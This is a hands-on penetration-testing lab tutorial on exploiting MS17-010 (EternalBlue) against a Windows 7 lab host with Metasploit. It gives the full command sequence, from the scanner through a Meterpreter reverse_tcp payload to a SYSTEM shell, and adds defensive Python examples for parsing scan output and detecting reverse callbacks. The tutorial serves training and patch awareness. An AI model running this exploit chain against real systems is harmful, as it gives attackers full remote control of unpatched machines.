Exploit MS17-010 EternalBlue on a Windows 7 Target in Metasploit


Introduction

MS17-010, publicly known as EternalBlue, is a critical vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. This vulnerability allows remote attackers to execute arbitrary code on affected systems. The Metasploit Framework is a powerful open-source tool for developing, testing, and executing exploit code.

In this lab, you will step into the role of a penetration tester. You will use the Metasploit Framework to first identify a vulnerable Windows 7 machine on the network using a scanner module. Then, you will configure and launch the EternalBlue exploit against the target to gain full remote control through a Meterpreter session. This hands-on experience will demonstrate the real-world impact of unpatched vulnerabilities.

For the purpose of this lab, a vulnerable Windows 7 machine is present on the network at the IP address 192.168.1.101.

Use the auxiliary/scanner/smb/smb_ms17_010 scanner to find targets

In this step, you will begin by launching the Metasploit console and using a specialized scanner module to confirm that the target is vulnerable to MS17-010. This is a crucial reconnaissance phase in any penetration test: the scanner only probes the SMB service and does not exploit it, so it can be run against a whole range of hosts to build an inventory of what needs patching.

First, open a terminal and start the Metasploit Framework console by running the msfconsole command. This may take a moment to load.

msfconsole

Once the console is loaded, you will see the Metasploit command prompt (msf6 >). Now, use the use command to select the MS17-010 scanner module.

use auxiliary/scanner/smb/smb_ms17_010

Next, you need to tell the scanner which hosts to check. View the available options for this module with the show options command.

show options

You will see a list of options. The RHOSTS option is required, which specifies the remote host(s) to scan. Set this to the IP address of our target Windows 7 machine.

set RHOSTS 192.168.1.101

With the target set, execute the scanner by typing run.

run

Metasploit will now scan the target. If the host is vulnerable, you will see a confirmation message in the output.

[+] 192.168.1.101:445   - Host is likely VULNERABLE to MS17-010! (OS: Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.1.101:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This output confirms that the target at 192.168.1.101 is vulnerable and a good candidate for our exploit.
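The scanner prints one status line per host, so its output can be turned into a remediation list without re-running anything. The following parser is an added example written for this lab, not part of Metasploit or of the original page: it reads the `[+] host:port - message` lines in the format shown above and returns a structured finding per host. The sample output it runs on is constructed; only the first host's line is taken from the lab, and the "does NOT appear vulnerable" line for a second host is an assumed wording.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample scanner output. The first line is the one shown in the lab;
# the second host and its message wording are assumptions for the example.
SAMPLE_SCAN_OUTPUT = """\
[+] 192.168.1.101:445   - Host is likely VULNERABLE to MS17-010! (OS: Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.1.102:445   - Host does NOT appear vulnerable.
[*] 192.168.1.101:445   - Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
"""

# "[+] 192.168.1.101:445   - message" -> level, ip, port, message
HOST_LINE = re.compile(
    r"^\[(?P<level>[+*\-!])\]\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+(?P<msg>.*)$"
)
# Optional "(OS: ...)" detail appended to a vulnerable-host line
OS_DETAIL = re.compile(r"\(OS:\s*(?P<os>[^)]*)\)")


@dataclass
class ScanFinding:
    ip: str
    port: int
    vulnerable: bool
    os: Optional[str]


def parse_scan_output(text: str) -> List[ScanFinding]:
    """Parse msfconsole scanner output into one finding per host.

    Progress lines ("Scanned N of M hosts") and lines without a host prefix
    are skipped. A host seen twice keeps the last verdict.
    """
    findings = {}
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if not m:
            continue
        msg = m.group("msg")
        if msg.startswith("Scanned "):
            continue
        os_match = OS_DETAIL.search(msg)
        findings[m.group("ip")] = ScanFinding(
            ip=m.group("ip"),
            port=int(m.group("port")),
            # The module shouts VULNERABLE in upper case; the negative verdict
            # uses lower case, so a case-sensitive test separates the two.
            vulnerable="VULNERABLE" in msg,
            os=os_match.group("os").strip() if os_match else None,
        )
    return list(findings.values())


def vulnerable_hosts(text: str) -> List[str]:
    """Sorted list of IPs the scanner reported as likely vulnerable."""
    return sorted(f.ip for f in parse_scan_output(text) if f.vulnerable)


if __name__ == "__main__":
    for finding in parse_scan_output(SAMPLE_SCAN_OUTPUT):
        status = "PATCH NOW" if finding.vulnerable else "ok"
        print(f"{finding.ip}:{finding.port}  {status}  {finding.os or ''}")
```

Feed it the console output saved with `spool` (or copied from the terminal) and the `vulnerable_hosts` list is what goes to the patching ticket; the OS string lets you confirm that the build (7601, Service Pack 1 here) predates the MS17-010 update.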

Select the exploit/windows/smb/ms17_010_eternalblue exploit

In this step, with the target confirmed as vulnerable, you will select the corresponding exploit module in Metasploit. The ms17_010_eternalblue module is designed to exploit this specific vulnerability.

Within the Metasploit console, use the use command again, but this time to load the exploit module.

use exploit/windows/smb/ms17_010_eternalblue

After executing the command, you will notice that your command prompt changes to reflect the context of the newly selected exploit module. This indicates that you are now working within the configuration space for the EternalBlue exploit.

msf6 exploit(windows/smb/ms17_010_eternalblue) >

This module contains the code that will be sent to the target machine to leverage the SMB vulnerability and allow you to execute further commands.

Set the RHOSTS option to the vulnerable Windows 7 target

In this step, you will configure the exploit module to target the specific IP address of the vulnerable machine. While the scanner could check a range of IPs, the exploit must be directed at a single, confirmed target.

Just like with the scanner module, you can view the configuration options for the exploit using the show options command.

show options

You will see that this module also has an RHOSTS option, which stands for "Remote Hosts". It is currently blank. You must set this to the IP address of your Windows 7 target, which you confirmed in the first step.

Use the set command to assign the IP address 192.168.1.101 to RHOSTS.

set RHOSTS 192.168.1.101

Metasploit will confirm the change.

RHOSTS => 192.168.1.101

Now the exploit knows exactly where to direct the attack.

Set the windows/x64/meterpreter/reverse_tcp payload

In this step, you will choose a payload. A payload is the code that will run on the target system after the exploit successfully compromises it. For this lab, you will use Meterpreter, an advanced, dynamically extensible payload.

The windows/x64/meterpreter/reverse_tcp payload is an excellent choice. It creates a connection from the target machine back to you (a "reverse" shell), which often gets through firewalls because outbound connections from a host are usually filtered far less strictly than inbound ones. It is also built for 64-bit Windows, matching the x64 target.

Use the set payload command to select it.

set payload windows/x64/meterpreter/reverse_tcp

Metasploit will confirm the payload has been set.

payload => windows/x64/meterpreter/reverse_tcp

Although Metasploit often selects a default payload, explicitly setting it ensures you are using the one best suited for your goal. You can run show options again to see the options for both the exploit and the payload. You will notice new options like LHOST (Listening Host) and LPORT (Listening Port): Metasploit typically fills LHOST with your machine's IP address automatically, and LPORT defaults to 4444, which is the port the handler will listen on for the reverse connection.
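The reverse connection described above is also what makes this stage visible to a defender: the SMB server that just received inbound traffic on 445 suddenly opens an outbound connection back to that same peer on an unrelated port. The following detection routine is an added example for this lab, not code from Metasploit or from the original page. It runs over constructed connection records (firewall or flow-collector style) that reuse the lab's addresses, and flags an outbound connection from a host to a peer that connected to its SMB service within the preceding window. The record format, the 60-second window and the sample flows are all assumptions of the example.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Time window (seconds) between an inbound SMB connection and a suspicious
# callback to the same peer. Assumed value for the example.
DEFAULT_WINDOW = 60
SMB_PORTS = frozenset({445, 139})


@dataclass(frozen=True)
class Conn:
    ts: int      # epoch seconds when the connection was first seen
    src: str     # initiating address
    dst: str     # responding address
    dport: int   # destination port


# Constructed connection log modelled on the lab: 192.168.1.100 runs the
# exploit, 192.168.1.101 is the Windows 7 target, the rest is background noise.
SAMPLE_FLOWS = [
    Conn(1698417000, "192.168.1.100", "192.168.1.101", 445),   # exploit traffic to SMB
    Conn(1698417010, "192.168.1.101", "192.168.1.100", 4444),  # reverse TCP callback
    Conn(1698417015, "192.168.1.50",  "192.168.1.101", 445),   # ordinary file-share client
    Conn(1698417020, "192.168.1.101", "192.168.1.20",  53),    # DNS lookup, unrelated peer
    Conn(1698417700, "192.168.1.101", "192.168.1.50",  445),   # SMB to another host, not a callback
]


def detect_smb_callbacks(
    flows: List[Conn], window: int = DEFAULT_WINDOW
) -> List[Tuple[str, str, int, int]]:
    """Return (server, peer, port, seconds_after_smb) for each outbound
    non-SMB connection a host makes back to a peer that connected to its
    SMB service within `window` seconds.

    Inbound SMB to the host is remembered per (server, client) pair; any later
    connection from the server to that client on a non-SMB port inside the
    window is reported. Ordinary SMB traffic in either direction never fires.
    """
    recent_smb = {}  # (server, client) -> timestamp of last inbound SMB
    alerts = []
    for c in sorted(flows, key=lambda f: f.ts):
        if c.dport in SMB_PORTS:
            recent_smb[(c.dst, c.src)] = c.ts
            continue
        # c.src is now acting as a client; was it recently an SMB server for c.dst?
        last_smb = recent_smb.get((c.src, c.dst))
        if last_smb is not None and 0 <= c.ts - last_smb <= window:
            alerts.append((c.src, c.dst, c.dport, c.ts - last_smb))
    return alerts


if __name__ == "__main__":
    for server, peer, port, delay in detect_smb_callbacks(SAMPLE_FLOWS):
        print(f"ALERT {server} connected back to {peer}:{port} "
              f"{delay}s after {peer} reached its SMB service")
```

The same pairing rule catches any reverse payload the exploit could have been configured with, not just port 4444, because it keys on the peer that just touched SMB rather than on a fixed port; hosts that legitimately both serve and consume SMB do not trigger it, since SMB-to-SMB traffic is excluded.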

Execute the exploit and establish a Meterpreter session

In this step, with all options configured, you will launch the exploit and take control of the target machine.

All the preparation is done. The exploit is selected, the target is set, and the payload is chosen. To launch the attack, simply use the exploit command.

exploit

Metasploit will now attempt to exploit the vulnerability on the target. You will see several status messages as it works. If successful, the exploit will deliver the Meterpreter payload, and you will see a message indicating a "WIN!" and that a new session has been opened.

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400

meterpreter >

The meterpreter > prompt signifies success! You now have a remote shell on the victim machine. To prove your control, run the getuid command to see what user account you are running as.

getuid

The output should be:

Server username: NT AUTHORITY\SYSTEM

NT AUTHORITY\SYSTEM is the highest level of privilege on a Windows system. You have successfully compromised the target. You can also run sysinfo to get system information.

sysinfo
Computer        : WIN7-VICTIM
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

Congratulations, you have successfully exploited MS17-010.

Summary

In this lab, you gained practical, hands-on experience with one of the best-known vulnerabilities of recent years using the Metasploit Framework.

You successfully:

  • Used an auxiliary scanner module to identify a host vulnerable to MS17-010.
  • Selected and configured the ms17_010_eternalblue exploit module.
  • Set a powerful meterpreter payload to establish a remote connection.
  • Executed the exploit and gained a SYSTEM-level Meterpreter session on the target Windows 7 machine.

This exercise highlights the critical importance of timely security patching for operating systems. A single, unpatched vulnerability can be enough for an attacker to gain complete control over a system.